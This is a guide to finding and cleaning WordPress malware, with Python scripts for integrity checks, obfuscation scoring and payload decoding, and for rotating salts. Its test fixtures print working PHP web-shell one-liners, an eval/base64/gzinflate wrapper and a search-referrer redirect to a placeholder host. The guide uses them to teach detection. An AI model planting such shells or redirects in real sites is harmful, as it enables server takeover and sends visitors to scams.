How to Detect Malware in WordPress: Complete Scan & Removal Guide
Finding out that your website is infected with malware is a nightmare: Google flags the site as dangerous, visitors are redirected to scam portals, and store checkouts fail. A successful recovery needs a structured approach: detect the malware, remove every backdoor it left behind, close the entry point, and prevent reinfection.
1. Common Symptoms of WordPress Malware
Malware rarely announces itself. Hackers want their scripts to run quietly to siphon off search traffic and customer data. Watch for these red flags:
- Unwanted Redirects: Visitors arriving from search engines are redirected to malicious pages, while direct visitors (including the site owner) see the normal site, because the injected code checks the referrer or user agent before redirecting. This is the classic "search redirect hack"; to reproduce it, request a page with a Google referrer header instead of browsing normally.
- Pharma Hacks & Index Spam: A `site:yourdomain.com` search shows hundreds of Japanese, Chinese, or pharmaceutical spam pages on your domain, usually cloaked content that only search crawlers are served.
- Blacklist Warnings: Browsers show a red "Deceptive site ahead" interstitial, and Google Search Console reports a security issue for the property.
- Rogue admin accounts: New, unrecognized users with the Administrator role appear in `wp_users`. Attackers create them as a second persistence mechanism alongside file-based backdoors, so a file cleanup alone does not remove them.
2. Scanning Core File Integrity
The most reliable way to find injected code is to compare file checksums against a known-good baseline. WordPress core files (everything in `/wp-admin/` and `/wp-includes/`, plus root files such as `index.php` and `wp-login.php`) must match the official release of the same version byte for byte; the only root file that legitimately differs is `wp-config.php`.
- Compare Core Files: Download a fresh copy of exactly the WordPress version you are running. Hash both trees (for example with `sha256sum`) and compare the lists: a changed hash, a missing file, or an extra file inside a core directory all need an explanation. WP-CLI's `wp core verify-checksums` performs the same comparison against the official checksums for your version.
- Check Theme Files: Review `header.php`, `footer.php`, and `functions.php`. Attackers append injections at the very top or bottom of these files, and `functions.php` is a favourite because it runs on every request, including admin screens.
- Scan the Uploads Folder: `/wp-content/uploads/` should contain only images, PDFs, and other media. Search it for `.php` files (and related extensions such as `.phtml`, plus double-extension names like `image.php.jpg`, which some server configurations still execute): any PHP in uploads is almost certainly a web shell or dropper. Blocking PHP execution in that directory at the web-server level closes this class of attack for good.
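The comparison described in this section, as an added example that is not code from the article: it hashes a clean tree and a live tree, reports modified, missing and extra core files, and lists PHP files under uploads. The "clean install" here is a constructed three-file stand-in; in practice the baseline is a fresh download of exactly the version you run.

```python
"""Added example (not code from the article): compare a WordPress tree against a
known-good baseline and flag PHP files in the uploads directory.
The baseline here is a constructed mini-install; in practice build it from a
clean download of exactly the version you run (or use wp core verify-checksums).
"""
import hashlib
import tempfile
from pathlib import Path

# Extensions a typical PHP handler may execute; none of them belong in uploads.
PHP_EXTENSIONS = {".php", ".phtml", ".php5", ".php7", ".phar"}
CORE_DIRS = ("wp-admin/", "wp-includes/")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map relative path (forward slashes) -> sha256 for every file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in root.rglob("*") if p.is_file()}


def is_core_path(rel):
    """Core = wp-admin/, wp-includes/ and root files other than wp-config.php."""
    return rel.startswith(CORE_DIRS) or ("/" not in rel and rel != "wp-config.php")


def compare_core(baseline, site_root):
    """Return (modified, missing, extra) relative paths for the core part of a site."""
    site = build_manifest(site_root)
    modified = sorted(p for p, h in baseline.items() if p in site and site[p] != h)
    missing = sorted(p for p in baseline if p not in site)
    # Files in core locations that the clean install does not ship: classic dropper spots.
    extra = sorted(p for p in site if p not in baseline and is_core_path(p))
    return modified, missing, extra


def looks_like_php(path):
    # "image.php.jpg" is flagged too: some Apache setups still hand it to PHP.
    return path.suffix.lower() in PHP_EXTENSIONS or ".php." in path.name.lower()


def php_in_uploads(site_root):
    uploads = Path(site_root) / "wp-content" / "uploads"
    return sorted(p.relative_to(site_root).as_posix()
                  for p in uploads.rglob("*") if p.is_file() and looks_like_php(p))


def _write(root, rel, text):
    p = Path(root) / rel
    p.parent.mkdir(parents=True, exist_ok=True)
    p.write_text(text)


# Constructed "clean install": three core files are enough to show the comparison.
CLEAN_FILES = {
    "index.php": "<?php require __DIR__ . '/wp-blog-header.php';\n",
    "wp-includes/version.php": "<?php $wp_version = '6.5';\n",
    "wp-admin/admin.php": "<?php /* admin bootstrap */\n",
}


def demo():
    """Build a clean tree and an infected copy of it, return the scan findings."""
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as site:
        for rel, text in CLEAN_FILES.items():
            _write(clean, rel, text)
            _write(site, rel, text)
        # Simulated compromise: eval appended to a core file, a dropper in wp-includes,
        # a web shell and a double-extension file in uploads, plus legitimate site files.
        _write(site, "wp-includes/version.php",
               CLEAN_FILES["wp-includes/version.php"] + "eval(base64_decode('aGk='));\n")
        _write(site, "wp-includes/class-wp-cache.php", "<?php @eval($_POST['x']);\n")
        _write(site, "wp-content/uploads/2024/01/photo.jpg", "not really a jpeg")
        _write(site, "wp-content/uploads/2024/01/wp-load.php", "<?php system($_GET['c']);\n")
        _write(site, "wp-content/uploads/2024/01/logo.php.png", "<?php echo 1;\n")
        _write(site, "wp-config.php", "<?php define('DB_NAME', 'wp');\n")
        modified, missing, extra = compare_core(build_manifest(clean), site)
        return {"modified": modified, "missing": missing, "extra": extra,
                "uploads_php": php_in_uploads(site)}


if __name__ == "__main__":
    for key, paths in demo().items():
        print(key, paths)
```

Two design points: the extra-file check is limited to core locations because `wp-content` legitimately differs from the download, and the uploads check matches on name only, so a PHP payload inside a real `.jpg` (which only matters if something includes it) still needs the content scan from the next section.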
3. Spotting Malicious Code Injections
Malware code is usually obfuscated so that signature scans and a casual read do not reveal what it does. Look for PHP functions that build and execute code from strings:
- `eval()` — executes a string as PHP code.
- `base64_decode()` — decodes a base64-encoded payload (encoded, not encrypted: it hides the text, nothing more).
- `gzinflate()` — decompresses a raw-deflate payload, often the layer under base64.
- `str_rot13()` — rotates letters to hide URLs and function names.
`base64_decode()` and `gzinflate()` also appear in legitimate plugins, so the strong signal is the combination: `eval()` (or `assert()` / `create_function()`) wrapped around one or more decoders and a long unreadable string literal.
An injection usually looks like a large, unreadable block of scrambled text at the top of a file:

```php
<?php
/* Injected Malware Example */
eval(gzinflate(base64_decode('HJ3HkqNIAg...')));
?>
```
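To see what such a block really does, score the file for the patterns above and then peel the decoder layers in the order PHP would run them. The following is an added example, not code from the article; the infected file is constructed inline (a referrer-conditional redirect to a made-up `bad.example` host, wrapped in `eval(base64_decode(...))` around `eval(gzinflate(base64_decode(...)))`).

```python
"""Added example (not code from the article): score PHP source for obfuscation
patterns and peel eval(<decoder>(...)) layers down to the real payload.
The infected file is constructed inline, wrapped the same way the snippet above is.
"""
import base64
import codecs
import re
import zlib

# Functions that execute or transform string payloads, with a rough weight.
# base64_decode and gzinflate also appear in legitimate plugins, so the score
# rewards combinations rather than any single call.
SUSPICIOUS_CALLS = {
    "eval": 5, "assert": 4, "create_function": 4,
    "base64_decode": 2, "gzinflate": 3, "gzuncompress": 3, "str_rot13": 3,
    "system": 3, "shell_exec": 3, "passthru": 3, "exec": 3,
}
CALL_RE = re.compile(r"\b(" + "|".join(SUSPICIOUS_CALLS) + r")\s*\(", re.I)
LONG_LITERAL_RE = re.compile(r"""['"][A-Za-z0-9+/=]{120,}['"]""")
LAYER_RE = re.compile(r"^\s*@?(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\((.*)\)\s*$", re.S)
LITERAL_RE = re.compile(r"""^\s*(['"])(.*)\1\s*$""", re.S)

DECODERS = {  # byte-level equivalents of the PHP functions
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -zlib.MAX_WBITS),  # raw DEFLATE, no header
    "gzuncompress": zlib.decompress,                             # zlib-wrapped
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
}


def score_php(source):
    """Return (score, matched function names, has_long_literal)."""
    hits = sorted({m.group(1).lower() for m in CALL_RE.finditer(source)})
    score = sum(SUSPICIOUS_CALLS[h] for h in hits)
    long_literal = LONG_LITERAL_RE.search(source) is not None
    score += 3 if long_literal else 0
    if "eval" in hits and DECODERS.keys() & set(hits):
        score += 5  # the classic eval(<decoder>(<blob>)) wrapper
    return score, hits, long_literal


def eval_arguments(source):
    """Yield the argument text of each eval(...) call, matching parentheses outside quotes."""
    for m in re.finditer(r"\beval\s*\(", source, re.I):
        depth, quote, i = 1, None, m.end()
        start = i
        while i < len(source) and depth:
            c = source[i]
            if quote:
                if c == "\\":
                    i += 1          # skip the escaped character
                elif c == quote:
                    quote = None
            elif c in "'\"":
                quote = c
            elif c == "(":
                depth += 1
            elif c == ")":
                depth -= 1
            i += 1
        if depth == 0:
            yield source[start:i - 1]


def peel(expr):
    """Unwrap nested decoder calls around a string literal -> (decoders outer-first, payload bytes)."""
    layers = []
    while True:
        m = LAYER_RE.match(expr)
        if not m:
            break
        layers.append(m.group(1).lower())
        expr = m.group(2)
    lit = LITERAL_RE.match(expr)
    if lit is None:
        raise ValueError("payload is not a plain string literal: " + expr[:40])
    data = lit.group(2).encode("latin-1")
    for name in reversed(layers):   # innermost decoder runs first, as PHP would
        data = DECODERS[name](data)
    return layers, data


def unwrap(source, max_rounds=10):
    """Peel eval wrappers repeatedly (payloads often contain another eval) -> (all layers, plain PHP)."""
    all_layers, current = [], source
    for _ in range(max_rounds):
        args = list(eval_arguments(current))
        if not args:
            break
        layers, data = peel(args[0])
        all_layers.extend(layers)
        current = data.decode("latin-1")
    return all_layers, current


PAYLOAD = ("if (stripos($_SERVER['HTTP_REFERER'] ?? '', 'google') !== false) "
           "{ header('Location: https://bad.example/'); exit; }")  # constructed redirect


def build_sample():
    """Constructed infected header.php: the redirect above under two eval/decoder layers."""
    c = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    deflated = c.compress(PAYLOAD.encode()) + c.flush()
    inner = "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(deflated).decode()
    outer = base64.b64encode(inner.encode()).decode()
    return "<?php\n/* header.php */\n@eval(base64_decode('%s'));\n?>" % outer


if __name__ == "__main__":
    sample = build_sample()
    print("score:", score_php(sample))
    layers, plain = unwrap(sample)
    print("layers:", layers, "\npayload:", plain)
```

The peeler only handles literal-string payloads; real samples also use concatenation, `chr()` sequences, variable-function calls (`$f = 'ev' . 'al';`) and `preg_replace` tricks. Those still raise the score, and the safe way to finish the analysis is to keep decoding offline, never to run the suspicious file in PHP.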
4. Steps to Remove WordPress Malware
Step 1: Backup Everything
Before deleting anything, take a full backup: export the database and archive the whole web root, and keep the copy off the server. It lets you roll back if you remove a legitimate template file, and it preserves evidence of how the site was compromised.
Step 2: Clean and Reinstall Core Files
Delete the `/wp-admin/` and `/wp-includes/` directories completely and upload fresh copies from the official WordPress download for the exact same version; also overwrite the root PHP files (`index.php`, `wp-login.php`, `wp-settings.php`, and the rest) but leave `wp-config.php` in place. `wp core download --force --version=X.Y` does the same from the command line. This removes anything hidden in core, but it does nothing for `/wp-content/`, which is where most injections actually live.
Step 3: Replace Plugin Folders
Do not try to clean plugin files line by line. Write down the active plugins, delete every directory under `/wp-content/plugins/`, and reinstall each one from the official repository at its latest (patched) version; premium plugins come fresh from the vendor, never from the infected backup. Check `/wp-content/mu-plugins/` and the drop-ins directly under `/wp-content/` (`db.php`, `object-cache.php`, `advanced-cache.php`) as well: they load on every request without appearing in the plugin list, which makes them popular hiding places.
Step 4: Clean functions.php and Reset Salts
Open the active theme's `functions.php` and remove any snippet you cannot account for (compare it with a clean copy of the theme where possible). Then open `wp-config.php` and replace the eight authentication keys and salts with fresh values from api.wordpress.org/secret-key/1.1/salt/. Changing the salts invalidates every existing login cookie, so any session the attacker holds is cut off. Follow up by resetting all user passwords (administrators first), deleting unrecognized admin accounts, and rotating the database, SFTP, and hosting-panel credentials, since anything stored on the server should be considered stolen.
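Steps 2 and 3 are file replacement; the salt rotation in Step 4 is the part that is worth scripting, because it must touch all eight defines and nothing else. The following is an added example, not code from the article: it generates the 64-character secrets locally (equivalent to pasting the wordpress.org generator's output), replaces the defines in place, and adds any that are missing above the "stop editing" marker so they take effect before `wp-settings.php` is loaded. The `wp-config.php` excerpt is constructed and deliberately lacks two of the eight defines.

```python
"""Added example (not code from the article): rotate the eight WordPress keys and
salts in wp-config.php with locally generated 64-character secrets, the same
effect as pasting fresh values from api.wordpress.org/secret-key/1.1/salt/.
The wp-config.php excerpt is constructed; note it lacks two of the eight defines.
"""
import re
import secrets
import string

SALT_NAMES = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
              "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
# Printable characters without the single quote or backslash, so the PHP literal stays valid.
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*()-_[]{}<>~+=,.;:/?|"
DEFINE_RE = re.compile(r"""define\(\s*(['"])(%s)\1\s*,\s*(['"])(.*?)\3\s*\);""" % "|".join(SALT_NAMES))
# Defines must sit above this comment: the require of wp-settings.php follows it.
STOP_MARKER = "/* That's all, stop editing!"


def new_secret(length=64):
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def current_salts(config_text):
    """Name -> value for every salt define present in the file."""
    return {m.group(2): m.group(4) for m in DEFINE_RE.finditer(config_text)}


def rotate_salts(config_text):
    """Return (new_text, names touched). Existing defines are replaced in place; missing ones are added."""
    replaced = []

    def fresh(m):
        replaced.append(m.group(2))
        return "define('%s', '%s');" % (m.group(2), new_secret())

    new_text = DEFINE_RE.sub(fresh, config_text)
    missing = [n for n in SALT_NAMES if n not in replaced]
    if missing:
        block = "".join("define('%s', '%s');\n" % (n, new_secret()) for n in missing)
        idx = new_text.find(STOP_MARKER)
        if idx >= 0:
            new_text = new_text[:idx] + block + new_text[idx:]
        else:  # no marker: append, and the operator must confirm it precedes wp-settings.php
            new_text = new_text.rstrip("\n") + "\n" + block
    return new_text, replaced + missing


# Constructed excerpt of an infected site's wp-config.php: default placeholders,
# two salts missing entirely (an old install that predates them).
SAMPLE_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
define( 'NONCE_KEY',        'put your unique phrase here' );
define( 'AUTH_SALT',        'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
$table_prefix = 'wp_';
/* That's all, stop editing! Happy publishing. */
require_once ABSPATH . 'wp-settings.php';
"""

if __name__ == "__main__":
    rotated, names = rotate_salts(SAMPLE_CONFIG)
    print("rotated:", names)
    print(rotated)
```

To apply it to a real site, read `wp-config.php`, pass the text through `rotate_salts`, and write the result back atomically; keep the pre-rotation copy outside the web root, because a stray `wp-config.php.bak` next to the original is served as plain text by many hosts and leaks the database password.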
5. Automate Future Protection
Removing malware is only half the battle. If the entry point stays open (usually an unpatched plugin or theme vulnerability, sometimes a stolen credential), the site will be re-infected, often within hours.
Deploying an automated **WordPress malware scanner** and virtual patcher is key. PatchWatch runs background integrity monitoring and applies instant virtual security patches to block incoming exploits before they reach your PHP interpreter.
Frequently Asked Questions
Why does my site get infected again after cleanup?
Usually because a hidden backdoor (a dropped file, a rogue admin user, or a modified plugin or mu-plugin) was left in place, or because the vulnerability that let the attacker in was never patched. Replace all plugin directories, update everything, rotate the keys and salts together with all passwords, and re-run the integrity comparison after cleanup to confirm nothing came back.
Can Google blacklist my site permanently?
No. Once your site is clean, you can request a review inside Google Search Console. Google usually clears the "Deceptive Site" warning screen within 24 to 72 hours of verification.
Disclaimer: Safe cleanup requires technical knowledge of PHP. If you are unsure, consult a security technician or run an automated scanner like PatchWatch.